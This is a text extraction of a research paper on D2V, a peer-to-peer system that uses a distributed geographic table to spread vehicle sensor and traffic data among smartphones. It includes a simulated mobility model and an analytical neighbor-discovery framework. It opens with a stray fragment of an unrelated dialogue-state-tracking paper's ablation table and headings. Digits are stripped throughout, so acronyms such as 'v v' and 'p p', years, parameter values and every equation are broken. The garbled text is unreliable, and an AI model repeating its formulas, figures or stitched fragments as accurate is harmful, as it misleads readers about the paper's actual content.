hi-dstc seq seq-bahdanau attn . . . . . . gcn-bahdanau attn . . . . . . rnn+gcn-bahdanau attn . . . . . . rnn-sea . . . . . . rnn+gcn-sea . . . . . . be-dstc seq seq-bahdanau attn . . . . . . gcn-bahdanau attn . . . . . . rnn+gcn-bahdanau attn . . . . . . rnn-sea . . . . . . rnn+gcn-sea . . . . . . gu-dstc seq seq-bahdanau attn . . . . . . gcn-bahdanau attn . . . . . . rnn+gcn-bahdanau attn . . . . . . rnn-sea . . . . . . rnn+gcn-sea . . . . . . ta-dstc seq seq-bahdanau attn . . . . . . gcn-bahdanau attn . . . . . . rnn+gcn-bahdanau attn . . . . . . rnn-sea . . . . . . rnn+gcn-sea . . . . . . en-dstc seq seq-bahdanau attn . . . . . . gcn-bahdanau attn . . . . . . rnn+gcn-bahdanau attn . . . . . . rnn-sea . . . . . . rnn+gcn-sea . . . . . . table : ablation results of various models on all versions of dstc . introduction related work background gcn for undirected graphs syntactic gcn model query encoder dialogue history encoder kb encoder sequential attention decoder contextual graph creation experimental setup datasets hyperparameters models compared results and discussions conclusion d v: a peer-to-peer architecture for data dissemination in smartphone-based vehicular applications submitted may accepted july published august corresponding author michele amoretti, michele.amoretti@unipr.it academic editor xiaodong wang additional information and declarations can be found on page doi . /peerj-cs. copyright picone et al. distributed under creative commons cc-by . open access d v: a peer-to-peer architecture for data dissemination in smartphone-based vehicular applications marco picone, michele amoretti, gianluigi ferrari and francesco zanichelli department of information engineering, università degli studi di parma, italy abstract vehicular data collection applications are emerging as an appealing technology to monitor urban areas, where a high concentration of connected vehicles with onboard sensors is a near future scenario. in this context, smartphones are, on one side, effective enablers of vehicle-to-vehicle (v v) and vehicle-to-infrastructure (v i) applications and, on the other side, highly sophisticated sensing platforms. in this paper, we introduce an effective and efficient system, denoted as d v, to disseminate vehicle-related information and sensed data using smartphones as v i devices. d v relies on a peer-to-peer (p p) overlay scheme, denoted as distributed geographic table (dgt), which unifies the concepts of physical and virtual neighborhoods in a scalable and robust infrastructure for application-level services. first, we investigate the discovery procedure of the dgt overlay network, through analytical and simulation results. then, we present and discuss an extensive simulation-based performance evaluation (considering relevant performance indicators) of the d v system, in a g wireless communication scenario. the simulation methodology combines deus (an application-level simulation tool for the study of large-scale systems) with ns- (a well-known network simulator, which takes into account lower layers), in order to provide a d v proof-of-concept. the observed results show that d v-based information sharing among vehicles allows to significantly reduce risks and nuisances (e.g., due to road defects and congestions). subjects computer networks and communications, distributed and parallel computing, mobile and ubiquitous computing keywords vehicular sensor networks (vsns), smartphones, peer-to-peer (p p), vehicle-to-infrastructure (v i), localization introduction driving safely, efficiently, and comfortably depends certainly on the vehicle status and on the driver behavior. however, a large number of external factors (e.g., traffic congestions, road defects, etc.) have a relevant impact and are difficult to predict without the support of ict technologies. among others, vehicular inter-networking has a prominent role (hartenstein & laberteaux, ), paving the way to several valuable applications, such as geocasting, mobile data sensing and storage, street-level traffic flow estimation, and others (lee & gerla, ). vehicular inter-networking builds upon how to cite this article picone et al. ( ), d v: a peer-to-peer architecture for data dissemination in smartphone-based vehicular applications. peerj comput. sci. :e ; doi . /peerj-cs. mailto:michele.amoretti@unipr.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. vehicle-to-vehicle (v v) and vehicle-to-infrastructure (v i) communications, as well as on hybrid variants (hartenstein & laberteaux, ). recently, the vehicular sensor network (vsn) research community has started investigating the possibility of using smartphones as v v and v i communication nodes, but also as portable sensing platforms (gerla & kleinrock, ). smartphones are characterized by an ever improving technology—in terms of computational, networking, and storage capabilities—and good (practically ubiquitous) connectivity. users often carry such powerful handheld devices in their cars, to take advantage of multimedia playback, navigation assistance, as well as internet connectivity. thus, in the near future, many vehicles may be exploited as mobile sensors to gather, process, and transmit data harvested along the roads in urban and extra-urban environments, potentially encompassing multi- ple types of information ranging from traffic/road conditions to pollution data and others. as a matter of fact, until support for ad-hoc wifi connectivity or for the new wi-fi- direct standard (wi-fi alliance) will be widespread, smartphone-based vsns will require the presence of a communication infrastructure (e.g., g/ g cellular networks, wimax). therefore, they will share the advantages of v i schemes over v v technologies, namely a better support in commercial off-the-shelf (cots) equipment, native long-range communication capabilities as well as support for broadcast or multicast communications (to the application level, at least). at the same time, cellular-network vsns exhibit some disadvantages with respect to v v schemes, such as: higher latency at short distances; local communication obtained only indirectly and by adding overhead; the need for service coverage; and the associated data traffic costs. while hybrid communication schemes, i.e., combining v v with v i capabilities, would inherently provide the most effective and robust solution, we remark that purely infrastructure-based communication does not limit the application level of data dissemination and processing to a specific centralized architecture. in fact, a v i infras- tructure does not necessarily imply a centralized organization, which would inevitably lead to scalability issues—for example, to cope with the information requirements of thousands or millions of vehicles moving around in a large metropolitan area. while multiple distributed (e.g., hierarchical) subsystems can be deployed to achieve better scalability, a completely decentralized peer-to-peer (p p) approach is more appealing. initially exploited within v v schemes (mahmoud & olariu, ), p p approaches have been recently adopted also to implement decentralized traffic information systems (tiss) (santa, moragon & gomez-skarmeta, ). in fact, p p strategies allow respon- sibility decentralization, as well as computational and communication load balancing, which can be beneficial for smartphone-based vsns (rybicki et al., ). in the context of p p tiss, in this paper we introduce the d v architecture, based on opportunistic mechanisms for the dissemination of data generated by vehicle sensors and drivers. d v requires no dedicated hardware and leverages upon cots and worldwide available devices (such as smartphones), rather than dedicated devices. smartphones are usually affected by high energy consumption when using networks and gps. however, this is not a real issue for vehicular applications, since smartphones will typically be connected picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. to an in-vehicle power source while using d v. to the best of our knowledge, d v is the only tis providing, at the same time, massive scalability (because of its p p nature), deployability (because of the light hardware requirements), and message configurability. with respect to the state of the art, d v has a higher coverage percentage—the ratio between the number of peers that actually receive a specific message and the total number of those which should receive it—with less bandwidth requirements. d v is based on a p p overlay scheme denoted as distributed geographical table (dgt) (picone, amoretti & zanichelli, a; picone, amoretti & zanichelli, b)—indeed, d v stands for dgt for vsns. the dgt overlay scheme represents a scalable and robust infrastructure for application-level services, and relies on the unification of the concepts of geographical and virtual neighborhoods (picone, amoretti & zanichelli, a). the dgt assumes that each peer knows its global position (gp)—which is reasonable, as nowadays every mobile device is equipped with a global positioning system (gps). the main contributions of this paper can be summarized as follows: . the introduction of the d v system, with its opportunistic dissemination strategy for vehicular information and sensed data; . a sound analytical framework for performance evaluation of the dgt-based proactive neighbor localization protocol embedded in d v; the dgt is introduced and partially analyzed in picone, amoretti & zanichelli ( a), picone, amoretti & zanichelli ( b); . the performance evaluation of the d v, by means of multi-layer discrete event simulations, using realistic vehicle motion patterns and taking into account dangerous road stretches and traffic jams. in particular, we apply a recently proposed methodol- ogy (amoretti et al., ) to integrate deus, an application-level simulation tool for the study of large-scale systems (amoretti, agosti & zanichelli, ), with ns- , a widely used simulation tool which takes into account lower layers (ns- development team). the paper is organized as follows. section ‘related work’ provides a summary of the state of the art about vsns. section ‘distributed geographic table’ recalls the main dgt concepts. section ‘d v system’ illustrates the principles of the d v system for traffic and sensed data dissemination. section ‘mobility model’ illustrates the main aspects of the mobility model used to characterize realistic vehicular scenarios. in sectiion ‘performance evaluation’, the results of the performance analysis of the proposed d v system are presented: section ‘dgt-based proactive localization’ is dedicated to the analytical and simulation-based performance analysis of the dgt-based discovery protocol embedded in d v; section ‘d v performance evaluation’ analyzes the performance of d v (both its dgt sublayer and its opportunistic dissemination strategy). finally, section ‘conclusions’ concludes the paper. related work several data dissemination strategies for vsns have been proposed in the literature (lee & gerla, ). a fundamental issue is connectivity: different wireless access and communi- cation methods have been evaluated, including dedicated short-range communication picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. (dsrc) (jiang et al., ), wimax/ . e (han et al., ), wlan (hadaller et al., ), as well as cellular systems (qureshi, carlisle & guttag, ). the use of a cellular communication network reduces the problem of implementing a working tis, but introduces, on the other hand, the issue of collecting and distributing data to interested users. in the following, we discuss some relevant research works related to vsns, distinguishing between v v and v i approaches. v v approaches most v v architectures rely on in-network aggregation mechanisms to improve communication efficiency by summarizing information that is exchanged between vehicles (dietzel et al., ). for example, in one of the earliest works in v v communications, lee et al. ( ) proposed mobeyes, a strategy for harvesting, aggregating, and distributing sensed data by means of proactive urban monitoring services provided by vehicles which continuously discover, maintain, and process information about events in an urban scenario. messages and summaries are routed to vehicles in the proximity, to achieve common goals, such as providing police cars with the trajectories of specific target cars. later, meneguette et al. ( ) proposed a network partition-aware geographical data dissemination protocol, which eliminates the broadcast storm and maximizes the data dissemination capability across network partitions with short delays and low overhead, at the expense of a high number of message transmitted. the same issue affects dove, proposed by yan, zhang & wang ( ). v v communication technology could mitigate traffic collisions and improve traffic congestion by exchanging basic safety information such as location, speed, and direction between vehicles within range of each other. recently, xiang et al. ( ) modeled vehicles’ data preferences and explored the feasibility and benefits of incorporating these preferences into the design of safety data dissemination protocols. furthermore, they designed pvcast, which assigns a higher transmission priority to packets that can satisfy a higher total data preferences of vehicles in the network by broadcasting. as a result, the differentiated transmission priorities of packets reduce contention and collision. another important aspect is the relationship between data dissemination performance and traffic congestion. du & dao ( ) recently developed analytical formulations to estimate information propagation time delay via a v v communication network formed on a one-way or two-way road segment with multiple lanes. the proposed study carefully involves several critical communication and traffic flow features in reality, such as wireless communication interference, intermittent information transmission, and dynamic traffic flow. moreover, this study elaborately analyzes the interactions between information and traffic flow under sparse and congested traffic flow conditions. v i approaches cellular networks are used in participatory vsn platforms, enabling applications such as ride quality monitoring, street-level traffic flow estimation, and proactive urban picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. surveillance (hull et al., ; burke et al., ; mohan, padmanabhan & ramjee, ; mun et al., ). initially, most participatory vsn platforms were based on the client/server paradigm, where all data generated by vehicles are stored in a central server (or server farm). hull et al. ( ) pointed out that the major technical challenges of such a solution are mostly related with the huge amount of simultaneous updates and queries generated by user moves and requests (each car is a source of queries and regularly sends its own measurements). for these reasons, researchers started investigating architectures based on the p p paradigm, to build a distributed tis where cars are not only consumers but also producers of information. rybicki et al. ( ) with peers on wheels and, more recently, with peertis (jedrzej et al., ), proposed v i architectures where participating cars are peers organized in a distributed hash table (dht). roads are divided into road segments, each with a unique id that is used as key in the dht. the main idea is that each peer is responsible for a certain part of the id space and, consequently, for a certain number of road segments. up to now, one of the troubling issues is the fact that obtaining full information about planned and alternative routes is expensive in terms of bandwidth consumption. santa, moragon & gomez-skarmeta ( ) presented another p p approach based on cellular networks and on the jxta middleware (sun microsystems, inc, ), to enable the transmission of information among vehicles and between vehicles and infrastructure, bounding the propagation of messages with respect to time and space (santa, moragon & gomez-skarmeta, ). a more recent location-aware p p overlay scheme for smart traffic applications is overdrive, developed by heep et al. ( ). overdrive builds a geographical neighborhood for each peer, taking into account not only peers’ positions, but also their speeds and directions. traffic information is then disseminated by means of efficient flooding mechanisms. distributed geographic table a structured decentralized p p overlay is characterized by a controlled overlay, shaped in a way that resources (or resource descriptors) are placed at appropriate locations (amoretti, ). moreover, a globally consistent protocol ensures that any peer can efficiently route a search to the peers that have the desired resource, even if the resource is extremely rare. beyond basic routing correctness, two important topology constraints guarantee that (i) the maximum number of hops in any route (route length) is small, so that requests are fulfilled quickly, and (ii) the maximum number of neighbors of any peer (maximum node degree) is small, so that maintenance overhead is not excessive. the dgt is a structured overlay scheme where each participant can efficiently retrieve information located near any chosen geographic position (picone, amoretti & zanichelli, a). in such a system, the responsibility for maintaining information about the position of active peers is distributed, for which a change in the set of participants causes minimal disruption. in the following, we recall the main dgt concepts using the p p system notation introduced by aberer et al. ( ). picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. in a generic dgt overlay, the set of peers is called p , each peer being characterized by a unique identifier id ∈ i (where i is the space of identifiers). the space of world’s coordinates is denoted as w and w ∈ w , w = ⟨latitude,longitude⟩ is a generic position. thus, a peer p ∈ p may be identified by the pair ⟨idp,wp⟩, where idp ∈ i and wp ∈ w . the distance d between two peers is defined as the actual geographic distance between their locations in the real world (also known as great-circle distance or orthodromic distance (longley et al., )). the neighborhood of a geographic location is the group of peers located inside a given region surrounding that location. the main service provided by the dgt overlay is request routing, allowing to find available peers in a specific region, i.e., to determine the neighborhood of a generic global position w ∈ w . routing is a distributed process implemented as asynchronous message passing. by executing the route (p,w,a) operation, a peer forwards to another peer p ∈ p a request for the list of peers that peer p knows to be located in the region a ∈ a, whose center is w ∈ w . thus, a routing strategy can be described as the following (possibly non-deterministic) function: n : p × w × a → p ( ) which returns the neighborhood n (p,w,a), around the geographic position w and within region a, known by peer p. the routing process is based on the evaluation of the region of interest centered in the target position. the idea is that each peer involved in the routing process selects, among its known neighbors, those that are likely to know a large number of peers located inside or close to the chosen region centered at the target point. if a contacted peer cannot find a match for the request, it does return the list of closest peers, taken from its routing table. this procedure can be used both to maintain the peer’s local neighborhood n and to find available peers close to a generic target. regarding the local neighborhood, the general aim of the proposed approach is to provide accurate knowledge of peers that are close to the requesting one (starting from a set of neighbors provided by a bootstrap node, during the overlay network joining phase), together with a reduced set of remote peer references which will be used to forward long range geographic queries. whenever a single active peer in the system wants to contact such an idea recalls granovetter’s theory of weak ties (granovetter, ), stating that human society is formed by small complete graphs whose nodes are strongly connected (friends, colleagues, etc.). such clusters are weakly connected between each other, e.g., a member of a group superficially knows a member of another group. the most important fact is that weak ties are those which make human society an egalitarian small world network, i.e., a giant cluster with small separation degree and no hubs (buchanan, ). other peers in its region (e.g., to provide or search for a service), it does not need to route additional and specific discovery messages to its neighbors (or to a supernode responsible for a specific zone) in order to find peers that are geographically close. instead, it simply reads its neighbors’ list, which is proactively filled with geographic neighbors. our peer neighborhood construction strategy has been inspired by kademlia (maymounkov & mazieres, ), which is used, for example, in recent versions of the emule client, as an alternative to the traditional edonkey protocol (emule project). many of kademlia’s benefits result from its use of the xor metrics to compute the distance between points in the resource identifier space. xor is symmetric, allowing kademlia participants to receive lookup queries from precisely the same distribution of peers contained in their routing tables, which are organized as sets of k-buckets. every k-bucket is a list having picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. up to k entries: in other words, each peer in the network has lists containing up to k peers, each list being associated with a given distance from the peer itself. in order to locate peers near a particular identifier, kademlia uses a single routing algorithm from the beginning till the end. peer neighborhood construction in dgt uses the geographic metric, instead of kademlia’s xor metric. each peer knows its gp, retrieved with a gps or with other localization technologies (e.g., gsm cell-based localization), and knows a set of real neighbors organized in a specific structure, based on the distances of these neighbors from the peer’s gp. the overlay network construction is based on the process described in the following. every peer maintains a set of geo-buckets (gbs), each one being a (regularly updated) list of known peers, sorted by their distances from the gp of the peer itself. gbs can be represented as k concentric circles, with increasing (application-specific) radii {ri} k i= and thicknesses {ri} k i= , with ri = i j= rj. if there is a known peer whose distance is larger than the radius of the outmost circle rk , it is inserted in another list which contains the peers located outside the region covered by the circle model. each peer in the gb set is characterized by (i) an identifier (id) which uniquely identifies the peer within the dgt; (ii) a gp, with latitude and longitude values retrieved by means of a gps receiver or other positioning systems; (iii) a contact address allowing the identification of the peer in the internet; (iv) and a number of known peers used to compare two peers which have the same distance. moreover, each peer maintains a set of message types which it is interested on. when a new peer wants to join the network, it sends a join request, together with its gp, to a bootstrap node, which returns a list of references to peers that are geographically close to the peer itself. it is important to emphasize that this information is not updated: referenced peers may have moved away from their initial locations. it is up to the joining peer to check for the actual availability of listed peers. such an operation is performed when the peer first joins, but also when the peer finds itself to be almost or completely isolated. in these situations (that typically arise when peers enter low density regions), the peer may send a new join request to the bootstrap node, in order to obtain a list of recently connected peers which may become neighbors. the main procedure used during peer discovery is find nodes(gp), which returns the β peers that are nearest to the specified gp. peer p keeps its neighborhood awareness up-to-date by periodically applying find nodes to its own global position gpp. such a procedure (with any target gp) may also be executed upon request from another peer. peer p searches in the gb related to the requested gp. the final objective of the peer lookup process is to find the α ≤ k peers that are nearest to the selected gp, including newly connected peers, as well as mobile peers that have entered the visibility zone. the lookup initiator starts by picking α peers from its closest non-empty gb—or, if that bucket has less than α entries, it just takes the α closest peers, by extending the lookup to all its gbs. such a peer set is denoted as c ( )i = {p ( ) i ( ),...,p ( ) i (α)} k i= . the initiator sends parallel find nodes requests, using its gp as target, to the α peers in c ( )i . each interrogated peer replies indicating β references. the initiator sorts the result list picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. according to the distance from the target position, then picks up α peers that it has not yet queried and re-sends the find nodes request (with the same target) to them. if a round of find nodes fails to return a peer closer than the closest one already known, the initiator re-sends the find nodes to the k closest peers not already queried. the lookup terminates when the initiator has obtained responses from the k closest peers, or after f cycles, each jth cycle generating an updated set c (j)i of nearest neighbors. thus, the number of sent find nodes(gp) messages is f · α + k and depends on the peer spatial density in the region of interest. a peer is allowed to run a new lookup procedure only if the previous one is completed, in order to reduce the number of exchanged messages and to avoid the overlapping of the same type of operations. the general idea is that soon after the bootstrap or when neighbor peers are highly dynamic, the discovery process period may be very short and may increase when the knowledge among active peers becomes sufficiently stable. any active peer in the network can change its geographic position for many reasons (e.g., the user may be walking, driving, etc.). in order to preserve the consistency of the dgt, each peer has to periodically schedule a maintenance procedure which compensates the network topological changes. the practical usability of a dgt critically depends on the messaging and computational overhead introduced by such a maintenance procedure, whose features and frequency of execution are application-dependent. when an active peer in the network changes its geographic position, it has to send updates of its gp to its neighbors, in order to make their knowledge more accurate. to avoid excessive bandwidth consumption, every peer communicates its position update to neighbors only if the displacement (with respect to the last communicated position) is higher than ϵ (dimension: (km)). if a peer receives a neighbor’s update indicating that the new position of the latter is out of its region of interest, the neighbor’s reference is removed from the appropriate gb and a remove message is sent to the peer. the dgt allows peers to have accurate knowledge of geographically close neighbors and a limited view of the outer world. however, whenever necessary and with limited incremental computational and transmission costs, a peer can find new peers which are entering the target region. the described p p localization scheme represents the core layer of the proposed d v system, which can discover and inform drivers who may be interested in specific traffic messages or data acquired by vehicle sensors. d v system most vehicular network safety applications need information from a very limited geographic region around the vehicle’s current position. this may not be the case for driving comfort applications, such as traffic intensity or traffic jam monitoring, as well as parking discovery (caliskan, graupner & mauve, ) or guidance systems, which distribute information about the traffic status of the entire city or of those regions where the car is located or moving to. the goal of the d v system, based on the dgt overlay scheme recalled in section ‘distributed geographic table’, is to provide a reliable and scalable solution for picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure d v and dgt layers. disseminating—in an opportunistic way—information coming from driver’s inputs or vehicle sensors, such as, for example, active shock absorber, cameras, engine, and temperature sensors. in fig. , an illustrative representation of the d v system, built on top of dgt, is shown. generally speaking, distributing information over long ranges in vehicular applications is a very challenging task in terms of how to gather, transport, and aggregate such information. the reference scenario of this paper is related to the case where the vehicular network and the user are interfaced uniquely through a mobile device. the information that enriches the knowledge base of the car is collected from internal and external data sources, namely vehicle or roadside infrastructure sensors. the on-board intelligence of the car extends, maintains, and disseminates such an information by creating a local view of the car surroundings. in the literature, different techniques for content dissemination in vsns are described, such as flooding and geocasting (tonguz et al., ; bronsted & kristensen, ), request/reply (zhao & cao, ; wegener et al., ), broadcasting, sharing (seskar et al., ), and beaconing (xu & barth, ; fujiki et al., ). in the d v system, we combine the dgt scheme with the opportunistic and spatiotemporal dissemination ap- proach proposed by leontiadis & mascolo ( ), which is based on the publish/subscribe paradigm and allows message distribution to all interested receivers in a given region, by keeping messages alive in that region for a specific period of time. owing to its properties, we believe that such an integrated solution fits well with a very dynamic scenario, where users can easily and frequently change their subscription interests according to their planned paths, the current season, their city neighborhood, and other parameters. picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the basic d v message is composed by: a type, for the notification category (for example, the class of traffic events or sensor data); a location, associated with the information; an event range (er), which represents the region that the notification should reach; an expiration time of the event; and a message payload containing—whenever necessary—additional and detailed information about the event. different types of messages can thus be distributed by means of the same dissemination protocol. it is possible to create, for example, a message to warn approaching users about a traffic queue or a dangerous situation, to distribute data extracted from the different sensors of the vehicle or to notify other users about a free space in a parking area. each user selects the list of message types he/she is interested on, and adds it to his/her peer descriptor, thus allowing other peers to send only appropriate messages, according to the receiver’s preferences. when a new message is generated, the publisher picks up from its gbs the closest known peers of the dgt overlay, within the event range, that are interested in the particular information type (by reading the peer descriptor) and sends them the new message. such an optimization can be obtained at the expense of a small overhead, due to the inclusion in the message of the list of previous recipients. when a notification is received, d v checks if it matches the user interests or not (in the presence of dynamic subscription) or if it is already known. in the case of a new information, the peer adds it to its knowledge base, and distributes it again to known interested peers. when a peer receives the references about a new peer in its region of interest, it checks if in its knowledge base there are notifications not yet expired that may be useful for that new peer. if the latter needs such an information (an hash-based comparison is performed), the peer provides it. during such a dissemination process, it is necessary to check if some messages have expired, and, consequently, to remove them and their references from the peer’s knowledge base, thus avoiding the distribution of obsolete notifications. mobility model the mobility model is one of the fundamental elements for realistic performance evaluation of simulated v v and v i networking applications. in our work, we take into account some ideas proposed by harri, filali & bonnet ( ) and fiore et al. ( ), about the key features that should be included in a vehicular mobility simulator, in order to obtain realistic motion patterns. moreover, our model partially follows the approach of zhou, xu & gerla ( ), where the key idea is to use switch stations (sss), connected via virtual tracks, to model the dynamics of vehicle and group mobility. for example, our simulative analysis considers a square area around the city of parma (italy), with sss inside and outside the city district: a google maps based representation of parma is shown in fig. . stations are connected to each other through virtual paths, which have one lane for every direction, speed limitations associated with the street category, and a specific road density limit to model vehicles’ speeds in traffic jam conditions. when a new car joins the network, it first associates with a random ss; then, it selects a new ss and starts moving along the connection path between the two sss. such a procedure is repeated every time the car reaches a new ss and has to decide its next destination. each ss has picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure example of simulated dgt-based vsn (in the city of parma, italy). an attraction/repulsion value which influences the user’s choice for the next destination station. this value may be the same for each path in order to allow a random trip selection. a set of parameters is associated with each car, thus affecting macroscopic and microscopic aspects of traffic circulation, like street and highway limitations (i.e., some types of vehicles are forbidden on particular paths), as well as acceleration, deceleration, and speed constraints. we model different external events which may happen during the traffic simulation and alter drivers’ behavior, such as: accidents, temporary road works, or bad road surface conditions due to ice, snow or potholes. we assume that these events can be detected by vehicle sensors. drivers do not only interact with obstacles, but also adapt their behaviors according to their knowledge about surroundings. for example, they may try to change their paths if they are informed about a traffic jam or an accident slowing or blocking, and they reduce their speed in proximity of locations characterized by bad surface conditions. we consider a microscopic flow model, where mobility parameters of a specific car are described with respect to other cars. several approaches take into account, for example, the presence of nearby vehicles when modeling vehicle speed (e.g., fluid traffic model (ftm) (seskar et al., ; krauss, wagner & gawron, ), and intelligent driver model (idm) trieber, hennecke & helbing, )). in particular, ftm is the most accurate for our scenario, with different speed limits for different virtual paths and low computational picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. requirements. in ftm, vehicle speed is a monotonically decreasing function of the vehicular spatial density, forcing lower values when the traffic congestion reaches a critical point. in our case, the desired speed of a vehicle moving along the points of the ith path is computed according to the following equation: vdes = max  vmin,v (i) max  − k kjam  ( ) where: vmin is the minimum vehicle speed and depends on the vehicle’s characteristics (dimension: (km/h)); v (i) max is the speed limit of the ith path (dimension: (km/h)); k is the current vehicular spatial density of the road (dimension: [vehicles/km]), given by n/l (n represents the number of vehicles on the road and l is its length in km), and kjam is the vehicular spatial density (dimension: (vehicles/km)) in correspondence to which a traffic jam is detected. as mentioned before, we also want to model the behavior of a driver in proximity of a road point with bad surface conditions. the idea is that a conscientious driver, knowing that along his/her road there is a potential dangerous location, reduces the car speed according to the distance from that point. the safe speed vsafe is defined by the following equations: vsafe = d k + k ( ) k = d limit vdes − vmin ( ) k = vmin ( ) where: d is the distance between the vehicle and path location with bad surface conditions (dimension: (km)); dlimit is the limiting distance (dimension: (km)) from which the evaluation of safe speed starts; k (dimension: (h)) and k (dimension: (km/h)) depend on the desired speed vdes (dimension: (km/h)) at the limiting distance and on the minimum speed vmin (dimension: (km/h)) near the dangerous location. performance evaluation we first present an analytical performance evaluation framework of the dgt-based proactive neighbor localization protocol illustrated in section ‘distributed geographic table’. the analytical results are confirmed by simulations, showing that the proposed framework is an effective and efficient approach to evaluate the number of discovery steps for highly precise (d v-instrumental) neighbor localization. we then investigate, through simulations, a d v-based application which allows vehicles to adapt their routes according to traffic information gathered from other vehicles in the area. dgt-based proactive localization assuming that n peers are distributed within a square surface with side of length l (dimension: (km)), the corresponding peer spatial density, denoted as ρ, is n/l picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. (dimension: (vehicles/km )). if peers are static and uniformly distributed over the square surface, ρ is also the local peer spatial density. in the presence of node mobility (but still under the assumption that there are n peers in the square region of interest), the peer distribution is likely to be non-uniform: the corresponding peer spatial density can be heuristically estimated as γ n/l , where γ ∈ r+ is a compensation factor to take into account the fact that peers could be locally denser (γ > ) or sparser (γ < ) than the average value ρ. assume that, at a specific time, a peer wants to identify the available geographic neighbors within a circular region of interest. such a region, centered at the peer, is denoted as r and its area is a. in general, within the region of interest of a peer there are two classes of neighbors: detectable (i.e., peers which can be detected by one or more other peers) and non-detectable (i.e., peers which cannot be detected by any other peer). assuming that peers are distributed according to a two-dimensional poisson distribu- tion with parameter ρ, the average number of peers in the region r is n(r)tot = ρ · a. let us this is an approximation. in fact, owing to node mobility, the local distribution is likely to be non-poisson. however, as we will consider only average values, the poisson approximation will be shown to be accurate. denote by x ∈ ( , ) the percentage of non-detectable peers in the region r (i.e., there are, on average, x · n (r) tot non-detectable peers). assuming further that the number of detectable peers in r has a poisson distribution with parameter ρ · a · ( − x), it follows that their average value is n (r) d = ρ · a · ( − x). as described in section ‘distributed geographic table’, during each step of the discovery procedure, a peer picks the closest α known neighbors (if available) and sends them simultaneous find nodes requests centered in the peer’s geographic location. the goal of the interrogating peer is to retrieve detectable peers in its region of interest. if, at the end of an iteration, no new peer is retrieved, the discovery process ends and will be rescheduled according to a specific strategy. in order to evaluate the number of discovered peers at each discovery iteration (without counting the same peer more than once), the α find nodes requests, scheduled at each discovery step, must be taken into account considering not only the intersections between pairs of peers, but also the possible intersections between η-tuples ( ≤ η ≤ α) of peers originating from the α contacted peers. the total number of such intersections is α i=  α i  = α − . ( ) in fig. , an illustrative scenario with α = overlapping circular regions (associated to contacted peers) is shown. since the intersection of α circular regions can be highly varying (depending on their relative positions), we simplify the analysis assuming that adjacent contacted peers are spaced by an angle π/α and are positioned in the center of the corresponding radius of the circular region of interest of the analyzed peer that is performing discovery requests. we denote as aj the sum of the areas of the intersection region shared only by the requesting peer and j contacted peers. in fig. , the areas {a ,a ,a } are indicated. such areas can be computed using the matlab library available at (vakulenko). explicit expressions picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure intersection regions between overlapping circular area of interest. (not shown here for the sake of conciseness) can be derived according to the analysis in fewell ( ). under the above assumptions, the average number of new peers discovered after s steps can be written as n(s) =   l s = n(s − ) + α j= dj (n(s − )) s > ( ) where: l is the initial size of the peer list; n( ) is the average number of initial peers (trans- ferred to the peer of interest); n(s − ) is the number of new peers discovered up to the (s − )th step (s ≥ ); dj (n(s − )) represents the average number of new peers discovered in the region of area aj upon querying n(s − ) peers and can be expressed as follows: dj (n(s − )) = ρ · aj · ( − x) · bj (n(s − )) ( ) where bj (n(s − )) is the probability that no replicas are obtained in the jth intersection between the applicant’s region of interest and the regions of interest of the n(s − ) queried picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure pmn as a function of the discovery step, considering (a) active peers and (b) , active peers. peers. this probability depends on: (i) the number of peers that share the same zone (i.e., j) and can answer with the same peer references; and (ii) the average number n(s − ) of known peers at step s − —in fact, the number of known peers at each step needs to be taken into account to evaluate potential replicas. considering the fact that if a peer knows its neighbors, the probability of discovering an already known peer is higher, the following heuristic expression for bj will be shown to allow to derive accurate performance results: bj (n(s − )) =  − n(s − ) n (r) d j . ( ) since j is the number of peers that share the same zone, in ( ), by using j as exponent of the probability of receiving replicas, the higher is j, the lower is bj. finally, the average number of newly discovered peers up to step s can be expressed as follows: n(s) = n(s − ) + α j= ρ · aj · ( − x) ·  − n(s − ) n (r) d j . ( ) note that the recursive analytical computation of {n(s)} stops when a pre-set peer discovery limiting number is reached. in fig. , performance results predicted by the analytical model proposed above are compared with simulation results obtained with deus (described in more detail in section ‘d v performance evaluation’), considering scenarios with (a) peers and (b) , peers. in both cases (a) and (b), peers are distributed within a square surface with side of length l = . km, with an initial peer list size with n( ) = l = peers, a limiting number of discovered peers equal to , and x = . . it can be observed that analytical performance results are very close to simulation results, so that one can conclude that the accuracy of the analytical framework is satisfactory. picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure pmn as a function of the discovery step, considering (a) and (b) find nodes requests at each neighborhood discovery step. in order to investigate the impact of α, in fig. the percentage of missing nodes (pmn) in the gbs of a peer, with respect to those actually present in the area, is shown, as a function of the discovery step, considering (a) α = and (b) α = . in both cases, the number of active peers is set to . it can be observed that the agreement between simulation and analytical results is even higher than in fig. . by observing the results in figs. and , 